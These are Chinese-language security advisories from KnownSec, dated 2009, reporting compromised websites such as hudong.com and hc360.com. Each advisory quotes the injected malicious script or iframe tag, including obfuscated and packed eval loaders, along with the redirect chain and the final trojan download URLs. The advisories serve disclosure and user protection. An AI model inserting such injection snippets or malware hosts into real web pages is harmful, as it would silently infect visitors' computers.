知道创宇

发布时间：Tue Sep 22 2009 20:59:21 UTC+0800
最后更新时间：Tue Sep 22 2009 20:59:21 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 互动百科（http://www.hudong.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://blog.hudong.com/

网页被嵌入恶意链接代码：

<script language=javascript src=http://%64%64%66%2E%78%6F%72%67%2E%70%6C/x.js?google_ad=95×27_ad></script>
挂马分析：
[root]http://blog.hudong.com/
[script]http://%64%64%66%2E%78%6F%72%67%2E%70%6C/x.js?google_ad=95×27_ad
[iframe]http://abh.dns0755.net/365/360.htm
[iframe]http://abh.dns0755.net/365/yt.htm
[script]http://abh.dns0755.net/365/yt.js
[iframe]http://abh.dns0755.net/365/xie.htm
[iframe]http://abh.dns0755.net/365/office.htm
[iframe]http://abh.dns0755.net/365/newlz.htm
[iframe]http://abh.dns0755.net/365/of.htm
[iframe]http://abh.dns0755.net/365/bf.htm
[script]http://abh.dns0755.net/365/aa.js
[iframe]http://abh.dns0755.net/365/aa.htm
[iframe]http://abh.dns0755.net/365/ff.html
[iframe]http://abh.dns0755.net/365/ie.html
[iframe]http://abh.dns0755.net/365/ff.html
[iframe]http://abh.dns0755.net/365/ie.html
[iframe]http://abh.dns0755.net/365/ff.html
[iframe]http://abh.dns0755.net/365/ff.html
最终下载病毒文件：
http://abh.dns0755.net/d/cc.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：11
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Mon Sep 21 2009 14:27:29 UTC+0800
最后更新时间：Mon Sep 21 2009 14:27:29 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 互游网（http://www.huyoo.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.huyoo.cn/

网页被嵌入恶意链接代码：

<script src=”http://ft919.%37%3766.org” type=”text/javascript” language=”JavaScript” id=”seraph6script617″  ></script>
挂马分析：
[root]http://www.huyoo.cn/
[script]http://ft919.%37%3766.org
[iframe]http://w97s.3322.org/jj/4.htm
[iframe]http://67i11.cn/x15/xx.html
[iframe]http://67i11.cn/x15/td14.htm
[iframe]http://67i11.cn/x15/yt.htm
[iframe]http://67i11.cn/x15/td09.htm
[iframe]http://67i11.cn/x15/yut.htm
[iframe]http://67i11.cn/x15/ytfl.htm
[iframe]http://67i11.cn/x15/ytfl1.htm
[iframe]http://67i11.cn/x15/of.htm
最终下载病毒文件：
http://d.eddxx.com/xx/x15.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：10
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Mon Sep 21 2009 11:27:35 UTC+0800
最后更新时间：Mon Sep 21 2009 11:27:35 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 珞珈网（http://www.luojia.net/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:
http://www.luojia.net/zuowen/2008/0916/article_58346.html

网页被嵌入恶意链接代码：

<script src=http://bbs.keyruns.co.cc/phpmyadmin/css/gcn.gif></script>
挂马分析：
log generated by mdecoder v0.2
[root]http://www.luojia.net/zuowen/2008/0916/article_58346.html
[script]http://bbs.keyruns.co.cc/phpmyadmin/css/gcn.gif
[iframe]http://online.keyrvn.co.cc/phpmyadmin/css/host.htm?gg
[script]http://online.keyrvn.co.cc/phpmyadmin/css/a.jpg
[exe]http://code.keyrunn.co.cc/phpmyadmin/tk.exe
[script]http://online.keyrvn.co.cc/phpmyadmin/css/c.jpg
[script]http://online.keyrvn.co.cc/phpmyadmin/css/d.css
[script]http://online.keyrvn.co.cc/phpmyadmin/css/e.jpg
[script]http://online.keyrvn.co.cc/phpmyadmin/css/f.css
[iframe]http://online.keyrvn.co.cc/phpmyadmin/css/oa.htm?9
[script]http://online.keyrvn.co.cc/phpmyadmin/css/of.js
[exe]http://code.keyrunn.co.cc/phpMyAdmin/tk.exe
[script]http://js.users.51.la/3103825.js
最终下载病毒文件：
http://code.keyrunn.co.cc/phpmyadmin/tk.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：23
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Mon Sep 21 2009 11:22:07 UTC+0800
最后更新时间：Mon Sep 21 2009 11:22:07 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 博导在线（http://www.bodool.net/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bodool.net/login.asp

网页被嵌入恶意链接代码：

</body><script src=http://%79%61%6f%4c%69%68%75%69%2e%63%6e></script>
挂马分析：
[root]http://www.bodool.net/
[iframe]http://www.bodool.net/login.asp
[script]http://yaolihui.cn
[iframe]http://axxo.9966.org/dszq/2.htm
[iframe]http://67i11.cn/x2/xx.html
[iframe]http://67i11.cn/x2/td14.htm
[script]http://67i11.cn/x2/14.js
[exe]http://d.eddxx.com/xx/x2.css
[script]http://67i11.cn/x2/15.js
[script]http://67i11.cn/x2/17.js
[script]http://67i11.cn/x2/16.js
[script]http://67i11.cn/x2/18.js
[iframe]http://67i11.cn/x2/yt.htm
[script]http://67i11.cn/x2/a8.jpg
[script]http://67i11.cn/x2/b.jpg
[script]http://67i11.cn/x2/url.jpg
[exe]http://d.eddxx.com/xx/x2.css
[script]http://67i11.cn/x2/c.jpg
[script]http://67i11.cn/x2/d.jpg
[script]http://67i11.cn/x2/e.jpg
[script]http://67i11.cn/x2/f.jpg
[iframe]http://67i11.cn/x2/td09.htm
[script]http://67i11.cn/x2/01.js
[exe]http://d.eddxx.com/xx/x2.css
[script]http://67i11.cn/x2/02.js
[iframe]http://67i11.cn/x2/yut.htm
[iframe]http://67i11.cn/x2/ytfl.htm
[iframe]http://67i11.cn/x2/ff.html
[script]http://67i11.cn/x2/ff.js
[exe]http://d.eddxx.com/xx/x2.css
[iframe]http://67i11.cn/x2/ie.html
[script]http://67i11.cn/x2/ie.js
[exe]http://d.eddxx.com/xx/x2.css
[iframe]http://67i11.cn/x2/ff.html
[iframe]http://67i11.cn/x2/ie.html
[iframe]http://67i11.cn/x2/ff.html
[iframe]http://67i11.cn/x2/ff.html
[iframe]http://67i11.cn/x2/ytfl1.htm
[iframe]http://67i11.cn/x2/x1.htm
[script]http://67i11.cn/x2/swfobject.js
[flash]http://67i11.cn/x2/./x1.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x3.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x4.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x2.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x5.swf
[exe]http://d.eddxx.com/xx/x2.css
[iframe]http://67i11.cn/x2/x2.htm
[script]http://67i11.cn/x2/swfobject.js
[flash]http://67i11.cn/x2/./x7.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x9.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x10.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x8.swf
[exe]http://d.eddxx.com/xx/x2.css
[flash]http://67i11.cn/x2/./x11.swf
[exe]http://d.eddxx.com/xx/x2.css
[iframe]http://67i11.cn/x2/x1.htm
[iframe]http://67i11.cn/x2/of.htm
[script]http://67i11.cn/x2/of.js
[exe]http://d.eddxx.com/xx/x2.css
[script]http://67i11.cn/x2/of3.jpg
[script]http://67i11.cn/x2/of.jpg
[script]http://67i11.cn/x2/of2.jpg
最终下载病毒文件：
http://d.eddxx.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：6
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Sun Sep 20 2009 13:59:31 UTC+0800
最后更新时间：Sun Sep 20 2009 13:59:31 UTC+0800
________________________________________
知道挂马监控平台于今日监测到UUSee网络电视网站（http://www.uusee.com）被植入恶意代码。
经知道安全团队确认，此次挂马事件是由于allyes.com的部分页面被植入恶意代码，UUSee网站引用了这些页面所导致的。

所挂网马如下：
http://ww3.niupan.com/html/tiyu/shtml/indexsss.html?1111
http://1111111.aiqiusese.3322.org/b207729/b20.htm
http://1111111.aiqiusese.3322.org/b207729/new.html
http://1111111.aiqiusese.3322.org/b207729/dpizi.htm
http://1111111.aiqiusese.3322.org/fx.htm
http://1111111.aiqiusese.3322.org/mlink.html
最终下载病毒文件：
http://jhgyuty.cn:822/lzz.css
http://jhgyuty.cn:822/bf.css
http://jhgyuty.cn:822/b20.css
http://jhgyuty.cn:822/real.css
http://jhgyuty.cn:822/real11.css
http://jhgyuty.cn:822/fl.css

除了主站受影响外，以下子域名网页也受到此次挂马事件的影响：
blog.uusee.com
club.uusee.com
mylist.uusee.com

目前，恶意代码已经被清除。

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Sat Sep 19 2009 22:29:58 UTC+0800
最后更新时间：Sat Sep 19 2009 22:29:58 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 慧聪网（http://www.hc360.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://active.b2b.hc360.com/HCStory/all2.aspx

网页被嵌入恶意链接代码：

<script src=http://z360.%4Eet/c.%6As></script><script src=http://z360.ne%74/c.js></script><script src=http://z360.n%45t/c.js></script><script src=http://z360%2Enet/%43.js></script>
挂马分析：
[root]http://active.b2b.hc360.com/HCStory/all2.aspx
[script]http://z360.%4eet/c.%6as
[iframe]http://ee00r.2288.org/fkzd/16.htm
[iframe]http://983h2.cn/x150/xx.html
[iframe]http://983h2.cn/x150/td14.htm
[iframe]http://983h2.cn/x150/yt.htm
[iframe]http://983h2.cn/x150/td09.htm
[iframe]http://983h2.cn/x150/yut.htm
[iframe]http://983h2.cn/x150/ytfl.htm
[iframe]http://983h2.cn/x150/ytfl1.htm
[iframe]http://983h2.cn/x150/of.htm
[script]http://z360.ne%74/c.js
[script]http://z360.n%45t/c.js
[script]http://z360%2enet/%43.js
最终下载病毒文件：
http://d.eddxx.com/xx/x150.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发布时间：Sat Sep 19 2009 22:14:53 UTC+0800
最后更新时间：Sat Sep 19 2009 22:14:53 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 哈尔滨都市网论坛（http://www.hadushi.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hadushi.com/bbs/include/js/common.js?9ff

网页被嵌入恶意链接代码：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’1.7(”<5 6=2://8.0/4.3></5>”)’,62,9,’com|document|http|js|k|script|src|write|z88b’.split(’|'),0,{}))
挂马分析：
[root]http://www.hadushi.com/bbs/viewthread.php
[script]http://www.hadushi.com/bbs/include/js/common.js?9ff
[script]http://z88b.com/k.js
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://983h2.cn/x115/xx.html
[iframe]http://983h2.cn/x115/td14.htm
[iframe]http://983h2.cn/x115/yt.htm
[iframe]http://983h2.cn/x115/td09.htm
[iframe]http://983h2.cn/x115/yut.htm
[iframe]http://983h2.cn/x115/ytfl.htm
[iframe]http://983h2.cn/x115/ytfl1.htm
[iframe]http://983h2.cn/x115/of.htm
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
[iframe]http://tommyr.9966.org/wwj/5.htm?1
最终下载病毒文件：
http://d.eddxx.com/xx/x115.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Fri Sep 18 2009 13:40:38 UTC+0800
最后更新时间：Fri Sep 18 2009 13:40:38 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 步步高音乐手机官方网站（http://www.bbkmobile.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bbkmobile.com/./u.js

网页被嵌入恶意链接代码：

var cookieString=document.cookie;
var start=cookieString.indexOf(”cookiesleep”);
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”cookiesleep=test;expires=”+expires.toGMTString();
document.write(”<iframe src=http://knownsec.9966.org/xm/1.htm? width=100 height=0 border=0></iframe>”);}
挂马分析：
[root]http://www.bbkmobile.com/
[script]http://www.bbkmobile.com/./u.js
[iframe]http://knownsec.9966.org/xm/1.htm?
[iframe]http://563f235.cn/x96/xx.html
[iframe]http://563f235.cn/x96/td14.htm
[iframe]http://563f235.cn/x96/yt.htm
[iframe]http://563f235.cn/x96/td09.htm
[iframe]http://563f235.cn/x96/yut.htm
[iframe]http://563f235.cn/x96/ytfl.htm
[iframe]http://563f235.cn/x96/ytfl1.htm
[iframe]http://563f235.cn/x96/of.htm
最终下载病毒文件：
http://d.eddxx.com/xx/x96.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Wed Sep 16 2009 19:40:37 UTC+0800
最后更新时间：Wed Sep 16 2009 19:40:37 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国课件站（http://www.cnkjz.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cnkjz.com/

网页被嵌入恶意链接代码：

<iframe src=http://432ddsds33232.8866.org/aa/b102.htm width=100 height=0></iframe>
挂马分析：
[root]http://www.cnkjz.com/
    [iframe]http://432ddsds33232.8866.org/aa/b102.htm
        [iframe]http://432ddsds33232.8866.org/aa/360.htm
            [iframe]http://432ddsds33232.8866.org/aa/firefox1.htm
            [iframe]http://432ddsds33232.8866.org/aa/gfddtt.htm
            [iframe]http://432ddsds33232.8866.org/aa/qqlove.htm
最终下载病毒文件：
http://543ffdfd44.9966.org/qq.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Tue Sep 15 2009 18:18:51 UTC+0800
最后更新时间：Tue Sep 15 2009 18:18:51 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 我爱电子书（http://www.52eshu.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.52eshu.com/

网页被嵌入恶意链接代码：

<iframe src=http://432ddsds33232.8866.org/aa/b104.htm width=100 height=0></iframe>
挂马分析：
[root]http://www.52eshu.com/adfile/ad1.htm
    [iframe]http://432ddsds33232.8866.org/aa/b104.htm
        [iframe]http://432ddsds33232.8866.org/aa/360.htm
            [iframe]http://432ddsds33232.8866.org/aa/firefox1.htm
            [iframe]http://432ddsds33232.8866.org/aa/gfddtt.htm
            [iframe]http://432ddsds33232.8866.org/aa/qqlove.htm
最终下载病毒文件：
http://3rdsddsd.7766.org/qq.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]